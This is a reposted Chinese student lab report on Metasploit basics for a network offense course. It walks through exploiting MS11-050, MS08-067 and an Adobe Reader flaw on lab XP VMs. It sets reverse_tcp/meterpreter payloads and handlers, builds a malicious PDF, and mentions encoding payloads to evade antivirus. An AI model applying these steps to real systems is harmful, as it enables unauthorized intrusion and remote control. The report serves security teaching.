20145223 杨梦云 《网络对抗》 MSF基础应用

最新推荐文章于 2025-09-05 21:22:23 发布
转载 最新推荐文章于 2025-09-05 21:22:23 发布 · 260 阅读 · 0 ·
CC 4.0 BY-SA版权
原文链接:http://www.cnblogs.com/20145223ymy/p/6711148.html
文章标签:

#网络 #操作系统 #系统安全

本文介绍了Metasploit框架的基础应用,包括exploit、payload和encode的概念解析,并详细记录了MSF在不同场景下的实验过程,如针对浏览器和Adobe阅读器的渗透攻击。

20145223 杨梦云 《网路对抗》 MSF基础应用

1、实验后回答问题:用自己的话解释什么是exploit,payload,encode

(1)百度百科上说Exploit 的英文意思就是利用,它在黑客眼里就是漏洞利用。我自己的理解是,在我们事先发现系统漏洞后,通过一些数据方面的相关设置,最后通过exploit来执行这些设置攻击漏洞。

(2)payload翻译为有效载荷,我们真正攻击漏洞所依靠的就是这些有着特定含义和作用的payloads.

(3)encode就是编码,为了不被靶机中的杀毒软件或防火墙检测到恶意代码的存在,对恶意代码重新进行编码包装,实现免杀。

2、实验总结与体会

  这次的实验我感觉其实并不难,只要掌握基本的命令,就可以通过msf实现操作。麻烦的地方在于因为系统的更新换代和防止渗透对漏洞安装了补丁,很多攻击只能在很久以前的系统上进行,有些时候要想实验成功完成可能还需要将系统上安装的漏洞补丁卸载。所以找到合适的靶机其实不太容易,这也说明了随着我们系统安全的不断升级,要想实现真正意义上的攻击是相当有难度的,现在电商绝大部分系统已经是win7或者win10,ie浏览器也已经更新到了版本IE11,如果我们再想通过以前的一些攻击手段,是没有办法实现的。不过这也并不意味着我们的系统已经足够安全,总会有我们没有发现的漏洞在我们的系统中存在着,也总会有新的漏洞在软件的更新后悄然潜入我们的系统当中,网络攻防依然是值得我们去关注的问题。

3、实验过程记录

ms11_050(针对浏览器的攻击)

1、msfconsole打开msf

890352-20170415200212705-1344498506.png

2、use windows/browser/ms11_050_mshtml_cobjectelement找到相对应的target,可攻击的靶机为带有ie 7的xp系统英文版

890352-20170415200241767-327805603.png

3、show options查看需要进行设置的参数

890352-20170415200259939-1277349246.png

4、设置ip和端口号(kali机ip为192.168.211.132

890352-20170415200338611-1102880770.png

5、showoptions 查看设置结果

890352-20170415200404033-1031205117.png

6、exploit生成靶机需要访问的ip地址

890352-20170415200432533-435065382.png

7、kali机访问目标地址,结果无法访问

890352-20170415200454080-1033735911.png

8、msf下可看见创建了一个ID为1的session

890352-20170415200507626-309020522.png

9、sessions -i 1开始连接后抓取靶机键盘

890352-20170415200519142-153002310.png

10、获取shell

890352-20170415200540376-782760498.png

m08_067(主动攻击)

1、search m08_067查看渗透模块的相关信息

890352-20170415200604705-1426343670.png

2、show payloads查看有效的攻击荷载,这里找到的是shell_reverse_tcp

890352-20170415200722080-1165355472.png

3、show targets查看可以被攻击的靶机的操作系统型号,这里我们用的靶机操作系统为windows xp sp3 English

890352-20170415200814673-1145090422.png

4、设置参数(有效荷载payloads),靶机ip为192.168.211.133,主机ip为192.168.211.132(这里ip可以自己设置,但需要两台主机在同一网段,可以相互ping通)

890352-20170415200836580-75116542.png

5、exploit操作系统为windows xp sp3 English的靶机已经被攻击

890352-20170415200856033-985092662.png

6、执行`dir

890352-20170415200952189-1395031174.png

7、kali机执行ipconfig/all

890352-20170415200917517-1470570946.png

8、 windows执行同样的操作

890352-20170415200938611-1573717917.png

Adobe阅读器渗透攻击(针对客户端)

1、kali下打开显示隐藏文件,输入use exploit/windows/fileformat/adobe_cooltype_sing,然后输入set payload windows/meterpreter/reverse_tcp设置攻击有效载荷payloads
set LHOST "KALI Ip"

set LPORT xxxx
2、exploit,生成pdf文件以后拷贝到xp虚拟机
3、back``返回,使用use exploit/multi/handler```新建一个监听模块。
4、使用set payload windows/meterpreter/reverse_tcp建立一个反向连接。端口号设置和攻击模块里的数据设置相同。
5、在靶机中打开pdf文件,相当于打开了一个后门程序,这里pdf打不开,因为其中包含了恶意代码

890352-20170415201143517-455831976.png

6、反弹链接后成功

890352-20170415201211189-48863883.png

7、可以查看靶机操作系统的相关信息,windows xp sp3,64位,中文语言

890352-20170415201231939-1725948945.png

8、ps命令 可以查看当前靶机中的系统进程

890352-20170415201246111-1157448790.png

9、获取靶机系统权限

890352-20170415201326595-1426335291.png

10、靶机在命令行查看本机tcp连接信息,可以看到与ip地址为192.168.211.132的kali机通过端口5223建立连接。

890352-20170415201343564-716104966.png

应用辅助模块。

1、输入search auxiliary可以找到许多msf辅助模块,在此基础上缩小范围,输入search auxiliary/dos/windows/ftp缩小范围,找到可以尝试应用于Windowsxpattacker靶机的模块

890352-20170415201537251-2010848180.png

2、···use auxiliary/search auxiliary/dos/windows/ftp、iis75_ftpd_iac_bof```进入模块,设置好相应参数后exploit

890352-20170415201432720-1689706553.png

结果是可以获取靶机IIS7.5版本及以下的FTP客户端FileZilla的相应版本号
3、尝试着另外做了一些其他辅助模块的应用,如m04_045,但是都失败了QAQ:

890352-20170415201452939-770084691.png

4、最后应用的是scanner/portscan/ack——ACK防火墙扫描

890352-20170415201546689-1841253603.png

对靶机扫描tcp的未过滤端口

转载于:https://www.cnblogs.com/20145223ymy/p/6711148.html

学生成绩管理系统(六):项目总结
weixin_30908707的博客
06-19 9508
学生成绩管理系统(六):项目总结 一、项目实现情况 初期项目计划: 简单的图形界面登录功能。 对数据库的的信息的查询功能。 对数据库的的信息的修改功能。 对数据库的的信息的删除功能。 对数据库的的信息的添加功能。 当以学生身份登录时只有查询的功能。 当教师登陆时既可以查询也可以进行修改、删除、添加的操作。 最终项目实现的功能: 软件功能架构图: 软件功能介绍: 输入用户名和密码进入系统主界...
渗透攻击基础
weixin_30834019的博客
07-14 5053
Metasploit框架中包涵数百个模块,没有人能用脑子把它们的名字全部记下来。在MSF终端中运行show命令会把所有的模块显示出来,也可以指定模块的类型来缩小搜索范围。 1. msf > show exploits Exploits ======== Name ...
ctf:kali2:扫描telnet版本:auxiliary/scanner/telnet/telnet_version
viviliving的专栏
12-09 1567
msf6 >msf6 >Examples:
渗透测试实例:Metasploitable3靶机
lxy123_com的博客
02-09 4594
实验环境:Kali虚拟机一台、4G运行,Metasploitable3靶机一台,IP地址192.168.22.20 实验目的:对Metasploitable3靶机进行渗透测试 实验步骤: (一),对靶机进行扫描 1,使用Neuss对靶机进行扫描
Metasploit辅助模块
aod83029的博客
10-21 946
msf>showauxiliary Auxiliary ========= NameDisclosureDateRankDescription ----...
metasploit - auxiliary
Nixawk
04-20 6239
msf >use auxiliarys/ use auxiliary/admin/android/google_play_store_uxss_xframe_rce use auxiliary/admin/appletv/appletv_display_image use auxiliary/admin/appletv/appletv_display_video use auxiliary/admi
metasploit使用辅助模块
天元喜羊羊的博客
05-15 1万+
显示所有的辅助模块: msf > show auxiliary Auxiliary ========= Name Disclosure Date Rank Description ----
关于metasploit的一些架构目录
热门推荐
悟世之路
10-08 2万+
metasploit的框架目录,位置在 /usr/share/
iis7.5 ftp设置
bibi333的专栏
04-26 1400
Windows 2008上的IIS7.5,FTP功能已经非常强大了,完全不下于Serv-U这样的第三方软件。本文小编就介绍在IIS7.5上配置独立账号的FTP站点。1、创建Windows账号右击点击“我的电脑”,选择“管理”打开服务器管理的控制台。展开“服务器管理器”,一路展开“配置”、“本地用户和组”,点“用户”项。然后在右边空白处点右键,选择“新用户”将打开新建用户的对话框。在此输入用户名te...
Kali linux 2016.2(Rolling)中的auxiliary模块详解
weixin_34195142的博客
05-23 4093
         不多说,直接上干货!     root@kali:~# msfconsole ______________________________________________________________________________ | ...
9.4 动态路由协议
2301_81476026的博客
09-04 739
​:表示路由协议的优先级,数值越小越优先。​。
计算机网络模型入门指南:分层原理与各层作用
2402_85030292的博客
09-04 804
所以,需要首先通过ARP协议获取对方的MAC地址,然后将收发双方的MAC地址形成一个MAC头部,加入到IP数据包(包)的前面,形成一个数据帧(Data Frame),最后发送到以太网。如果没有分层,网络通信的所有功能(从物理信号传输到应用数据解析)都需要由一个模块完成,就像用一个程序实现 “快递打包 + 运输 + 配送 + 签收” 的全流程 —— 任何一个环节的改动(如包装规格变化)都可能影响整个系统,开发和维护几乎不可能实现。:负责 “用户数据的格式处理”(类似 “快递里的物品包装与拆封”)。
ZeroMQ 编译 & 项目使用流程文档
qq_41531368的博客
09-05 275
zmq
如何将两个网段互相打通
weixin_42795092的博客
09-04 655
两个网段互通的核心是配置正确的路由规则小型网络用单台三层设备(路由器 / 交换机)直接连接,依赖直连路由;跨设备网络需在每个网关添加静态路由,明确 “下一跳”;跨公网需通过 VPN 建立加密隧道,实现虚拟互通。配置后务必通过ping命令或网络扫描工具(如tracert)验证连通性,逐步排查防火墙、子网掩码等潜在问题。
Day36 IO多路复用技术
最新发布
oareen的博客
09-05 615
单线程或单进程同时监测若干个文件描述符是否可以执行IO操作的能力。:解决用更少的资源(避免线程/进程创建开销、上下文切换成本、资源竞争)完成更多事件流的并发处理。
手机网络IP归属地更改方法总结
q2669689953的博客
09-01 610
需要明确的是:IP地址的归属地是由您的网络服务提供商(ISP)根据网络基础设施分配的,个人无法直接、永久地改变其物理归属地。当您从一个地方移动到另一个地方,或者重启手机时,网络可能会为您重新分配一个不同归属地的IP(尤其是在省际边界)。这样,您对外显示的IP就是服务器的IP,其归属地自然是服务器所在地。更彻底的方法是:手动切换到另一个运营商的网络(如果您的手机支持双卡或eSIM),因为不同运营商在相同地点的IP池归属可能不同。原理:您的网络请求通过一个中间代理服务器转发,对方看到的是代理服务器的IP。
Websocket链接如何配置nginx转发规则?
圆子mom的博客
09-04 253
前端页面部署在localhost:8088端口上,后端websocket服务部署在localhost:8082端口上,下面介绍两种环境的转发规则。前端接口:ws://localhost:8088/api/ws/runs/16?token=null。1、开发环境(vue3框架)
IPv6——ICMPv6与NDP
VVVVWeiYee的博客
09-05 802
ICMPv6
网络安全入门基础教程】网络安全零基础学习方向及需要掌握的技能
AUG2468的博客
09-01 1079
《0基础如何进入网络安全行业》摘要:针对零基础转行网络安全,建议先明确方向(如web安全、渗透测试等),避免盲目学习。推荐通过B站、安全论坛等免费资源自学基础知识,并利用靶场实践。考证建议从CISP/NISP入手,找工作掌握50%技能即可尝试。强调不要追求速成,真正的成长需要持续学习和实践。文章提供了安全社区推荐、学习路线图及90多节免费视频教程资源(见文末卡片),帮助初学者系统入门。提醒网络安全≠黑客工具,需根据岗位需求针对性学习。
(计算机网络)DNS解析流程及两种途径
savemeill的博客
09-05 781
客户端向 DNS 服务器发出请求,要求它必须返回最终结果。中间查询由该服务器自己完成,客户端只需等待结果。客户端向 DNS 服务器请求,服务器只返回自己知道的最优答案,如果不知道,就告诉客户端“去问谁”。客户端需要多次询问,直到得到结果。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值